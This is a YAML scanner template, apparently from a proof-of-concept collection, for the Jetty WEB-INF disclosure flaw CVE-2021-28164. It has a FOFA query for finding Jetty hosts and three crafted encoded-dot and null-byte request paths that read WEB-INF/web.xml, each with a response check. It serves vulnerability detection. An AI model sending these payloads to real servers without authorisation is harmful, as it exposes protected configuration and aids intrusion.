product: Jetty
vName: Jetty WEB-INF 敏感信息泄露
type: 信息泄露
vID:
  - CVE-2021-28164
level: 3
vDesc: Jetty 9.4.37引入对RFC3986的新实现，而URL编码的.字符被排除在URI规范之外，这个行为在RFC中是正确的，但在servlet的实现中导致攻击者可以通过%2e来绕过限制，下载WEB-INF目录下的任意文件，导致敏感信息泄露。该漏洞在9.4.39中修复。
version: ''
note: ''
search:
  FOFA: app="Jetty"
protocol: http
link: https://github.com/Threekiii/Awesome-POC/blob/master/中间件漏洞/Jetty WEB-INF 敏感信息泄露漏洞 CVE-2021-28164.md
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: or
exploit:
  - exp:
      method: get
      follow: false
      path: /%u002e/WEB-INF/web.xml
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - web-app
              - <display-name>
            logic: and
  - exp:
      method: get
      follow: false
      path: /.%00/WEB-INF/web.xml
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - web-app
              - <display-name>
            logic: and
  - exp:
      method: get
      follow: false
      path: /a/b/..%00/WEB-INF/web.xml
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - web-app
              - <display-name>
            logic: and